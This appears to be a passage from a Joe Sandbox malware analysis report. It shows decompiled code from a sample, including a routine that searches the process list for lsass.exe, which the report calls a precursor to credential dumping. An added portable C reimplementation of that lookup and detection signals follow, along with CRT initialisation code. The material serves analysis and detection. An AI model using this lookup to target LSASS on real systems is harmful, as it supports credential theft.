      • Part of subcall function 00F645A5: TlsSetValue.KERNEL32(00000000,?,00F646E1,?,?,00F6474B,?,00F63785), ref: 00F645CF
    • SetLastError.KERNEL32(00000000,?,?,00F6474B,?,00F63785), ref: 00F64738
      • Part of subcall function 00F661C9: Sleep.KERNEL32(00000000), ref: 00F661F1
    • DecodePointer.KERNEL32(00000000,?,?,00F6474B,?,00F63785), ref: 00F6470A
    • GetCurrentThreadId.KERNEL32(?,?,00F6474B,?,00F63785), ref: 00F64720
      • Part of subcall function 00F6614A: HeapFree.KERNEL32(00000000,00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66160
      • Part of subcall function 00F6614A: GetLastError.KERNEL32(00000000,?,00F64734,00000000,?,?,00F6474B,?,00F63785), ref: 00F66172
      • Part of subcall function 00F64616: GetModuleHandleW.KERNEL32(KERNEL32.DLL,00F69E48,00000008,00F6471E,00000000,00000000,?,?,00F6474B,?,00F63785), ref: 00F64627
      • Part of subcall function 00F64616: InterlockedIncrement.KERNEL32(00F6B008), ref: 00F64668
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
    C-Code - Quality: 40%
    			// Finds lsass.exe in the process list. E00F618D9(&_a4, 5) calls NtQuerySystemInformation
    			// with SystemProcessInformation (class 5) into a LocalAlloc'd buffer (see the subcall APIs
    			// below); the loop then walks the SYSTEM_PROCESS_INFORMATION entries through
    			// NextEntryOffset, the ULONG at offset 0 of each entry (*_t27), handing each entry and the
    			// context block at &_v24 (name, saved argument, result slot) to E00F6194B, which compares
    			// ImageName with "lsass.exe" via RtlEqualUnicodeString(..., CaseInSensitive = 1). The walk
    			// stops when E00F6194B returns 0 or NextEntryOffset is 0; it does not check that an offset
    			// stays inside the buffer. _v16 is the slot E00F6194B fills on a match; what it holds is not
    			// shown on this page. NtQuerySystemInformation(5) plus a case-insensitive compare against
    			// "lsass.exe" is the classic precursor of LSASS memory access (credential dumping); the
    			// page shows only the lookup, not what is done with the result.
    			E00F61982(void* _a4) {
    				void* _v12;
    				void* _v16;
    				void* _v20;
    				char _v24;
    				void* __esi;
    				intOrPtr _t21;
    				void* _t25;
    				intOrPtr* _t27;

    				_v24 =  &_v12; // context: pointer to the UNICODE_STRING below
    				_v20 = _a4; // caller's argument, saved before _a4 is reused as the buffer pointer
    				_t25 = 0;
    				_v16 = 0; // result slot filled by E00F6194B
    				RtlInitUnicodeString( &_v12, L"lsass.exe");
    				_a4 = 0;
    				if(E00F618D9( &_a4, 5) >= 0) { // 5 = SystemProcessInformation
    					_t27 = _a4; // first SYSTEM_PROCESS_INFORMATION entry
    					_push( &_v24);
    					_push(_t27);
    					while(E00F6194B() != 0) { // non-zero: keep walking
    						_t21 =  *_t27; // NextEntryOffset
    						if(_t21 != _t25) {
    							_t27 = _t27 + _t21; // next entry
    							_push( &_v24);
    							_push(_t27);
    							continue;
    						}
    						break; // NextEntryOffset == 0: last entry
    					}
    					LocalFree(_a4);
    					_t25 = _v16;
    				}
    				return _t25;
    			}

    Instruction addresses (per-line address column collapsed): 0x00f6198c to 0x00f619ed

    APIs
    • RtlInitUnicodeString.NTDLL(?,lsass.exe), ref: 00F619A4
      • Part of subcall function 00F618D9: NtQuerySystemInformation.NTDLL(00000000,00000000,00000000,00000000,00000000,00F619B7,00000005), ref: 00F618EE
      • Part of subcall function 00F618D9: GetModuleHandleW.KERNEL32(kernel32,LocalAlloc,00000040,00001000,?,00000000,00F619B7,00000005), ref: 00F6190B
      • Part of subcall function 00F618D9: GetProcAddress.KERNEL32(00000000,?,00000000,00F619B7,00000005), ref: 00F61912
      • Part of subcall function 00F618D9: NtQuerySystemInformation.NTDLL(?,00000000,00001000,00000000,?,00000000,00F619B7,00000005), ref: 00F61928
      • Part of subcall function 00F618D9: LocalFree.KERNEL32(?,?,00000000,00F619B7,00000005), ref: 00F61936
      • Part of subcall function 00F6194B: RtlEqualUnicodeString.NTDLL(?,?,00000001,00000000,?,00F619D8,?,?), ref: 00F6195D
    • LocalFree.KERNEL32(?,?,?), ref: 00F619DF
    Strings
    • lsass.exe (RtlInitUnicodeString argument in the C-Code above)
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd
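    The process-list walk that E00F61982 performs, written out as an added example in portable C. This is the editor's illustration, not code from the sample, from Joe Sandbox or from any project. It models only the leading fields of the x86 SYSTEM_PROCESS_INFORMATION layout declared in winternl.h, builds a constructed four-entry snapshot in memory instead of calling NtQuerySystemInformation, and stores ImageName.Buffer as an offset from the snapshot base (an assumption made so it runs on any host; in a real snapshot it is an absolute pointer into the same allocation). The case-insensitive compare covers ASCII only, which is all RtlEqualUnicodeString(..., CaseInSensitive = TRUE) needs for a name like lsass.exe. The function names (find_pid_by_image, build_sample_snapshot, lookup_in_sample) and the PIDs are made up.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>
#include <string.h>

/* Leading fields of the x86 SYSTEM_PROCESS_INFORMATION layout from winternl.h; the thread
 * array and later fields are not needed for a name lookup and are omitted. */
typedef struct {
    uint16_t Length;          /* in bytes, not characters */
    uint16_t MaximumLength;
    uint32_t Buffer;          /* x86 pointer on a real system; here an offset from the snapshot base (assumption) */
} UNICODE_STRING32;

typedef struct {
    uint32_t NextEntryOffset; /* 0 marks the last entry: the `*_t27 != 0` test in E00F61982 */
    uint32_t NumberOfThreads;
    uint8_t  Reserved1[48];
    UNICODE_STRING32 ImageName;   /* at offset 0x38 */
    int32_t  BasePriority;
    uint32_t UniqueProcessId;
} SPI32_HEAD;

/* ASCII-only case-insensitive UTF-16 compare, the part of RtlEqualUnicodeString(...,
 * CaseInSensitive = TRUE) that a name like lsass.exe exercises. */
static int utf16_ieq(const uint16_t *a, size_t alen, const uint16_t *b, size_t blen)
{
    if (alen != blen) return 0;
    for (size_t i = 0; i < alen; i++) {
        uint16_t x = a[i], y = b[i];
        if (x >= 'a' && x <= 'z') x -= 'a' - 'A';
        if (y >= 'a' && y <= 'z') y -= 'a' - 'A';
        if (x != y) return 0;
    }
    return 1;
}

/* Walk the snapshot; return UniqueProcessId of the first entry whose ImageName equals `name`
 * (case-insensitively), or 0 if nothing matches. Unlike the sample's loop, an entry or name
 * that would run past the end of the buffer ends the walk instead of being read. */
uint32_t find_pid_by_image(const uint8_t *snap, size_t snap_len, const char *name)
{
    uint16_t want[64], cur[64]; size_t wlen = strlen(name);
    if (wlen > 64) return 0;
    for (size_t i = 0; i < wlen; i++) want[i] = (uint8_t)name[i];
    for (size_t off = 0;;) {
        SPI32_HEAD e;
        if (off + sizeof e > snap_len) return 0;
        memcpy(&e, snap + off, sizeof e);
        size_t nbytes = e.ImageName.Length;
        if (nbytes <= sizeof cur && (size_t)e.ImageName.Buffer + nbytes <= snap_len) {
            memcpy(cur, snap + e.ImageName.Buffer, nbytes);
            if (utf16_ieq(cur, nbytes / 2, want, wlen)) return e.UniqueProcessId;
        }
        if (e.NextEntryOffset == 0) return 0;
        off += e.NextEntryOffset;
    }
}

/* Append one entry at `off`: the header, then the UTF-16 name directly behind it. */
static size_t put_entry(uint8_t *snap, size_t off, const char *name, uint32_t pid, int last)
{
    SPI32_HEAD e;
    size_t n = strlen(name), total = (sizeof e + n * 2 + 2 + 7) & ~(size_t)7;
    memset(&e, 0, sizeof e);
    e.ImageName.Length = (uint16_t)(n * 2);
    e.ImageName.Buffer = (uint32_t)(off + sizeof e);
    e.UniqueProcessId = pid;
    e.NextEntryOffset = last ? 0 : (uint32_t)total;
    memcpy(snap + off, &e, sizeof e);
    for (size_t i = 0; i < n; i++) {
        uint16_t c = (uint8_t)name[i];
        memcpy(snap + off + sizeof e + i * 2, &c, 2);
    }
    return off + total;
}

/* Constructed four-entry snapshot (not captured from a live system); returns its length. */
size_t build_sample_snapshot(uint8_t *snap, size_t cap)
{
    if (cap < 512) return 0;
    memset(snap, 0, cap);
    size_t off = put_entry(snap, 0, "", 0, 0);          /* Idle process: empty ImageName */
    off = put_entry(snap, off, "System", 4, 0);
    off = put_entry(snap, off, "lsass.exe", 624, 0);    /* made-up PIDs */
    return put_entry(snap, off, "explorer.exe", 1840, 1);
}

/* Look `name` up in the constructed snapshot, as E00F61982 does for lsass.exe. */
uint32_t lookup_in_sample(const char *name)
{
    uint8_t snap[1024];
    size_t len = build_sample_snapshot(snap, sizeof snap);
    return find_pid_by_image(snap, len, name);
}

int main(void)
{
    printf("lsass.exe -> PID %u\n", (unsigned)lookup_in_sample("lsass.exe"));
}
```

    For detection the combination is the signal, not any single call: NtQuerySystemInformation with class 5, followed by RtlEqualUnicodeString against "lsass.exe", in a module that resolves LocalAlloc through GetProcAddress rather than its import table. The walk above terminates on NextEntryOffset == 0 and also stops when an offset or name would leave the buffer, which the sample's loop does not check.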
    C-Code - Quality: 91%
    			// MSVC CRT _initptd: fills a fresh _tiddata (exception action table, 'C' locale defaults,
    			// ptmbcinfo = __initialmbcinfo at 0xf6b008, ptlocinfo = the argument or __ptlocinfo) and
    			// bumps the refcounts under _MB_CP_LOCK (0xd) and _SETLOCALE_LOCK (0xc). Not sample-specific.
    			E00F64616(void* __ebx, void* __edi, void* __esi, void* __eflags) {
    				intOrPtr _t26;
    				intOrPtr _t30;
    				intOrPtr _t39;
    				void* _t40;
    
    				_t31 = __ebx;
    				_push(8);
    				_push(0xf69e48);
    				E00F65910(__ebx, __edi, __esi);
    				GetModuleHandleW(L"KERNEL32.DLL");
    				_t39 =  *((intOrPtr*)(_t40 + 8));
    				 *((intOrPtr*)(_t39 + 0x5c)) = 0xf68fc8;
    				 *(_t39 + 8) =  *(_t39 + 8) & 0x00000000;
    				 *((intOrPtr*)(_t39 + 0x14)) = 1;
    				 *((intOrPtr*)(_t39 + 0x70)) = 1;
    				 *((char*)(_t39 + 0xc8)) = 0x43;
    				 *((char*)(_t39 + 0x14b)) = 0x43;
    				 *(_t39 + 0x68) = 0xf6b008;
    				E00F66117(__ebx, 1, 0xd);
    				 *(_t40 - 4) =  *(_t40 - 4) & 0x00000000;
    				InterlockedIncrement( *(_t39 + 0x68));
    				 *(_t40 - 4) = 0xfffffffe;
    				E00F646B8();
    				E00F66117(_t31, 1, 0xc);
    				 *(_t40 - 4) = 1;
    				_t26 =  *((intOrPtr*)(_t40 + 0xc));
    				 *((intOrPtr*)(_t39 + 0x6c)) = _t26;
    				if(_t26 == 0) {
    					_t30 =  *0xf6b770; // 0xf6b698
    					 *((intOrPtr*)(_t39 + 0x6c)) = _t30;
    				}
    				E00F6425A( *((intOrPtr*)(_t39 + 0x6c)));
    				 *(_t40 - 4) = 0xfffffffe;
    				return E00F65955(E00F646C1());
    			}

    Instruction addresses (per-line address column collapsed): 0x00f64616 to 0x00f646b1

    APIs
    • GetModuleHandleW.KERNEL32(KERNEL32.DLL,00F69E48,00000008,00F6471E,00000000,00000000,?,?,00F6474B,?,00F63785), ref: 00F64627
      • Part of subcall function 00F66117: __amsg_exit.LIBCMT ref: 00F66139
      • Part of subcall function 00F66117: EnterCriticalSection.KERNEL32(?,?,?,00F64660,0000000D), ref: 00F66141
    • InterlockedIncrement.KERNEL32(00F6B008), ref: 00F64668
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(00000000,00000001,?,?,?,00F6469F,?), ref: 00F6426C
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64279
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64286
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F64293
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642A0
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642BC
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642CC
      • Part of subcall function 00F6425A: InterlockedIncrement.KERNEL32(?,?,?,00F6469F,?), ref: 00F642E2
    Strings
    • KERNEL32.DLL (GetModuleHandleW argument in the C-Code above)
    Memory Dump Source
    • Source File: 00000005.00000001.1688583422.00F61000.00000020.sdmp, Offset: 00F60000, based on PE: true
    • Associated: 00000005.00000001.1688551748.00F60000.00000002.sdmp
    • Associated: 00000005.00000001.1688595430.00F68000.00000002.sdmp
    • Associated: 00000005.00000001.1688625204.00F6B000.00000008.sdmp
    • Associated: 00000005.00000001.1688653195.00F6C000.00000004.sdmp
    • Associated: 00000005.00000001.1688693952.00F6D000.00000002.sdmp
    Joe Sandbox IDA Plugin
    • Snapshot File: hcaresult_5_1_f60000_F915.jbxd